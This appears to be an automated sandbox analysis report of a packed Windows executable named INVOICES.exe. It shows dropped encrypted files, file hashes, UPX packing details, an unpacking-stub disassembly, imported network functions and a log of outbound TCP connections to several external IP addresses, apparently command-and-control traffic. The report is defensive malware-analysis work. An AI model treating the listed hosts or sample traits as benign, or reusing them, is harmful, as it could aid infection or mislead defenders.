                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):287232
                                                                                                                                Entropy (8bit):7.994680500900089
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:wftt3dtq1reqbUczd6MXEQvxc0HYxQ7h4he6wbJ6qBUKiV6:WrttUdTXEQvxjTmejlBUKK6
                                                                                                                                MD5:1A417BA73F30B448C473814D121AB7F2
                                                                                                                                SHA1:649BD864A35BD177C0C84D8C2EBD67D0958D1950
                                                                                                                                SHA-256:292410118C7D53672E6F4C012F0A22774A7F6D3CFFE8F1A59AA51D4C147B2EE1
                                                                                                                                SHA-512:678F461F365B060A4845E19E6075280BD3566D7BD3549A73D838758623E6A21026513FB78E72D88C7918A302C226340230F560D13DC2809852246832506B1558
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.k.c.7FKYk.F...z.W2...cZ;...Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY.UGOT*.ZF.^.q.G..../&).8&)V%P=.%*7]:3o8Ph&3_wX>.....8(+?.EYL.W1P7FKYJTN.gU/.{Q0.mW!.C...u:R.N....0P.Q...{/=..=%YjQ7.FKY3UGOZe.TF}V0PR..83UGOZ5HT.1U0[6MKYcQGOZ5HTF1W.C7FKI3UG/^5HT.1W!P7FIY3SGOZ5HTF7W1P7FKY35COZ7HTF1W1R7..Y3EGOJ5HTF!W1@7FKY3UWOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7Fe-V-3OZ5L.B1W!P7F.]3UWOZ5HTF1W1P7FKY.UG/Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ

                                                                                                                                C:\Users\user\AppData\Local\Temp\sticket

                                                                                                                                Download File
                                                                                                                                Process:C:\Users\user\Desktop\INVOICES.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):287232
                                                                                                                                Entropy (8bit):7.994680500900089
                                                                                                                                Encrypted:true
                                                                                                                                SSDEEP:6144:wftt3dtq1reqbUczd6MXEQvxc0HYxQ7h4he6wbJ6qBUKiV6:WrttUdTXEQvxjTmejlBUKK6
                                                                                                                                MD5:1A417BA73F30B448C473814D121AB7F2
                                                                                                                                SHA1:649BD864A35BD177C0C84D8C2EBD67D0958D1950
                                                                                                                                SHA-256:292410118C7D53672E6F4C012F0A22774A7F6D3CFFE8F1A59AA51D4C147B2EE1
                                                                                                                                SHA-512:678F461F365B060A4845E19E6075280BD3566D7BD3549A73D838758623E6A21026513FB78E72D88C7918A302C226340230F560D13DC2809852246832506B1558
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Preview:.k.c.7FKYk.F...z.W2...cZ;...Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY.UGOT*.ZF.^.q.G..../&).8&)V%P=.%*7]:3o8Ph&3_wX>.....8(+?.EYL.W1P7FKYJTN.gU/.{Q0.mW!.C...u:R.N....0P.Q...{/=..=%YjQ7.FKY3UGOZe.TF}V0PR..83UGOZ5HT.1U0[6MKYcQGOZ5HTF1W.C7FKI3UG/^5HT.1W!P7FIY3SGOZ5HTF7W1P7FKY35COZ7HTF1W1R7..Y3EGOJ5HTF!W1@7FKY3UWOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7Fe-V-3OZ5L.B1W!P7F.]3UWOZ5HTF1W1P7FKY.UG/Z5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ5HTF1W1P7FKY3UGOZ

                                                                                                                                Static File Info

                                                                                                                                General

                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                                                                                                Entropy (8bit):7.969114892132771
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.39%
                                                                                                                                • UPX compressed Win32 Executable (30571/9) 0.30%
                                                                                                                                • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                File name:INVOICES.exe
                                                                                                                                File size:700'416 bytes
                                                                                                                                MD5:90c8ef1083fbf63ae33f23d51513a611
                                                                                                                                SHA1:28513b7108e382d811902d22d3749568adf296eb
                                                                                                                                SHA256:bfd180717755dd026fcbc5b370cea34a1ed365deb5e512420b63a5382f111764
                                                                                                                                SHA512:cc6f2bf6239934f4166b5c093a2f4c9691527afdfe265cef167a7970a9b88b4107b210fe254d8161f67e2224fcba8cc955f43104dfd4dd87bd246d7b2794934f
                                                                                                                                SSDEEP:12288:DozGdX0M4ornOmZIzfMwHHQmRROXKsV2eyIXfsCaMm4iQpvJ35LqfIPSSXg:D4GHnhIzOa/ePECCihpLqAP6
                                                                                                                                TLSH:0FE423D5E0D1A19ED4A205F94C128D3B356FFD2DE5206C4BB2A77A08ED376428623C6E
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                                                                File Icon

                                                                                                                                Icon Hash:0847a5a9ad2d61b0

                                                                                                                                Static PE Info

                                                                                                                                General

                                                                                                                                Entrypoint:0x52ca00
                                                                                                                                Entrypoint Section:UPX1
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x67202CA1 [Tue Oct 29 00:30:25 2024 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:fc6683d30d9f25244a50fd5357825e79

                                                                                                                                Entrypoint Preview

                                                                                                                                Instruction
                                                                                                                                pushad
                                                                                                                                mov esi, 004D7000h
                                                                                                                                lea edi, dword ptr [esi-000D6000h]
                                                                                                                                push edi
                                                                                                                                jmp 00007F6A78FB4ECDh
                                                                                                                                nop
                                                                                                                                mov al, byte ptr [esi]
                                                                                                                                inc esi
                                                                                                                                mov byte ptr [edi], al
                                                                                                                                inc edi
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4EAFh
                                                                                                                                mov eax, 00000001h
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc eax, eax
                                                                                                                                add ebx, ebx
                                                                                                                                jnc 00007F6A78FB4ECDh
                                                                                                                                jne 00007F6A78FB4EEAh
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4EE1h
                                                                                                                                dec eax
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc eax, eax
                                                                                                                                jmp 00007F6A78FB4E96h
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc ecx, ecx
                                                                                                                                jmp 00007F6A78FB4F14h
                                                                                                                                xor ecx, ecx
                                                                                                                                sub eax, 03h
                                                                                                                                jc 00007F6A78FB4ED3h
                                                                                                                                shl eax, 08h
                                                                                                                                mov al, byte ptr [esi]
                                                                                                                                inc esi
                                                                                                                                xor eax, FFFFFFFFh
                                                                                                                                je 00007F6A78FB4F37h
                                                                                                                                sar eax, 1
                                                                                                                                mov ebp, eax
                                                                                                                                jmp 00007F6A78FB4ECDh
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4E8Eh
                                                                                                                                inc ecx
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jc 00007F6A78FB4E80h
                                                                                                                                add ebx, ebx
                                                                                                                                jne 00007F6A78FB4EC9h
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                adc ecx, ecx
                                                                                                                                add ebx, ebx
                                                                                                                                jnc 00007F6A78FB4EB1h
                                                                                                                                jne 00007F6A78FB4ECBh
                                                                                                                                mov ebx, dword ptr [esi]
                                                                                                                                sub esi, FFFFFFFCh
                                                                                                                                adc ebx, ebx
                                                                                                                                jnc 00007F6A78FB4EA6h
                                                                                                                                add ecx, 02h
                                                                                                                                cmp ebp, FFFFFB00h
                                                                                                                                adc ecx, 02h
                                                                                                                                lea edx, dword ptr [edi+ebp]
                                                                                                                                cmp ebp, FFFFFFFCh
                                                                                                                                jbe 00007F6A78FB4ED0h
                                                                                                                                mov al, byte ptr [edx]

                                                                                                                                Rich Headers

                                                                                                                                Programming Language:
                                                                                                                                • [ASM] VS2013 build 21005
                                                                                                                                • [ C ] VS2013 build 21005
                                                                                                                                • [C++] VS2013 build 21005
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                • [ASM] VS2013 UPD5 build 40629
                                                                                                                                • [RES] VS2013 build 21005
                                                                                                                                • [LNK] VS2013 UPD5 build 40629

                                                                                                                                Data Directories

                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1818fc0x424.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x12d0000x548fc.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x181d200xc.rsrc
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x12cbe40x48UPX1
                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                Sections

                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                UPX00x10000xd60000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                UPX10xd70000x560000x55e00a28411f0795d6b9c1fc67929c419323cFalse0.9873061089883551data7.935738348120997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                .rsrc0x12d0000x550000x54e00fcf71183dcf60ec29f044b27f0ce792aFalse0.9655657446612665data7.969680204762934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                Resources

                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                RT_ICON0x12d3b40x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                RT_ICON0x12d4e00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024EnglishGreat Britain0.4875886524822695
                                                                                                                                RT_ICON0x12d94c0x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096EnglishGreat Britain0.34310506566604126
                                                                                                                                RT_ICON0x12e9f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishGreat Britain0.2629668049792531
                                                                                                                                RT_STRING0xcaf900x594emptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xcb5240x68aemptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xcbbb00x490emptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xcc0400x5fcemptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xcc63c0x65cemptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xccc980x466emptyEnglishGreat Britain0
                                                                                                                                RT_STRING0xcd1000x158emptyEnglishGreat Britain0
                                                                                                                                RT_RCDATA0x130fa40x50435data1.0003376353963567
                                                                                                                                RT_GROUP_ICON0x1813e00x30dataEnglishGreat Britain0.9166666666666666
                                                                                                                                RT_GROUP_ICON0x1814140x14dataEnglishGreat Britain1.15
                                                                                                                                RT_VERSION0x18142c0xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                                RT_MANIFEST0x18150c0x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                                                                                                Imports

                                                                                                                                DLLImport
                                                                                                                                KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                                                                                                                ADVAPI32.dllGetAce
                                                                                                                                COMCTL32.dllImageList_Remove
                                                                                                                                COMDLG32.dllGetOpenFileNameW
                                                                                                                                GDI32.dllLineTo
                                                                                                                                IPHLPAPI.DLLIcmpSendEcho
                                                                                                                                MPR.dllWNetUseConnectionW
                                                                                                                                ole32.dllCoGetObject
                                                                                                                                OLEAUT32.dllVariantInit
                                                                                                                                PSAPI.DLLGetProcessMemoryInfo
                                                                                                                                SHELL32.dllDragFinish
                                                                                                                                USER32.dllGetDC
                                                                                                                                USERENV.dllLoadUserProfileW
                                                                                                                                UxTheme.dllIsThemeActive
                                                                                                                                VERSION.dllVerQueryValueW
                                                                                                                                WININET.dllFtpOpenFileW
                                                                                                                                WINMM.dlltimeGetTime
                                                                                                                                WSOCK32.dllconnect

                                                                                                                                Possible Origin

                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                EnglishGreat Britain

                                                                                                                                Network Behavior

                                                                                                                                Network Port Distribution

                                                                                                                                TCP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Oct 29, 2024 16:54:07.736346006 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:07.741885900 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:07.741976023 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:07.750056028 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:07.755552053 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641187906 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641231060 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641246080 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641261101 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641284943 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641299009 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641314983 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641329050 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641345978 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.641514063 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:08.641514063 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:08.793138027 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:08.793342113 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:08.794737101 CET4970780192.168.2.8194.58.112.174
                                                                                                                                Oct 29, 2024 16:54:08.800318003 CET8049707194.58.112.174192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:23.969654083 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:23.975110054 CET8049709199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:23.975203037 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:23.986207008 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:23.992036104 CET8049709199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:24.627417088 CET8049709199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:24.627605915 CET8049709199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:24.627780914 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:25.090483904 CET8049709199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:25.090588093 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:25.492165089 CET4970980192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:26.510874987 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:26.516602993 CET8049710199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:26.516690016 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:26.527187109 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:26.532778978 CET8049710199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:27.136584997 CET8049710199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:27.136610031 CET8049710199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:27.136704922 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:27.587565899 CET8049710199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:27.587774992 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:28.038944006 CET4971080192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:29.057809114 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:29.063905001 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:29.063985109 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:29.080543041 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:29.088602066 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:29.088618040 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:29.775293112 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:29.775329113 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:29.775418043 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:30.244187117 CET8049711199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:30.244256973 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:30.585798025 CET4971180192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:31.671700954 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:31.677175045 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:31.677252054 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:31.684633017 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:31.690013885 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:32.301740885 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:32.302568913 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:32.302717924 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:32.755834103 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:32.755969048 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:32.756829977 CET4971280192.168.2.8199.59.243.227
                                                                                                                                Oct 29, 2024 16:54:32.762331009 CET8049712199.59.243.227192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:37.871479988 CET4971380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:37.877052069 CET80497133.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:37.877149105 CET4971380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:37.888039112 CET4971380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:37.893826962 CET80497133.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:38.585422993 CET80497133.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:38.585983038 CET4971380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:39.398464918 CET4971380192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:39.403918982 CET80497133.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:40.455709934 CET4971480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:40.461184978 CET80497143.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:40.461313963 CET4971480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:40.472532988 CET4971480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:40.478367090 CET80497143.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:41.156519890 CET80497143.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:41.156577110 CET4971480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:41.976793051 CET4971480192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:41.982681036 CET80497143.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.040766954 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:43.046225071 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.046319962 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:43.068149090 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:43.073755026 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.073813915 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.684602022 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:43.684772015 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:44.570229053 CET4971580192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:44.576132059 CET80497153.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:45.674669027 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.680464029 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:45.680536985 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.692089081 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:45.697987080 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.330796957 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.382544041 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.676260948 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:46.676393032 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.677282095 CET4971680192.168.2.83.33.130.190
                                                                                                                                Oct 29, 2024 16:54:46.683768034 CET80497163.33.130.190192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:51.701333046 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.706784964 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:51.706845999 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.717940092 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:51.723324060 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.674695015 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.726331949 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:52.856127024 CET8049717103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:52.856194973 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:53.226515055 CET4971780192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.251993895 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.648396015 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:54.648483992 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.660399914 CET4971880192.168.2.8103.71.154.12
                                                                                                                                Oct 29, 2024 16:54:54.665805101 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.661431074 CET8049718103.71.154.12192.168.2.8
                                                                                                                                Oct 29, 2024 16:54:55.710676908 CET4971880192.168.2.8103.71.154.12
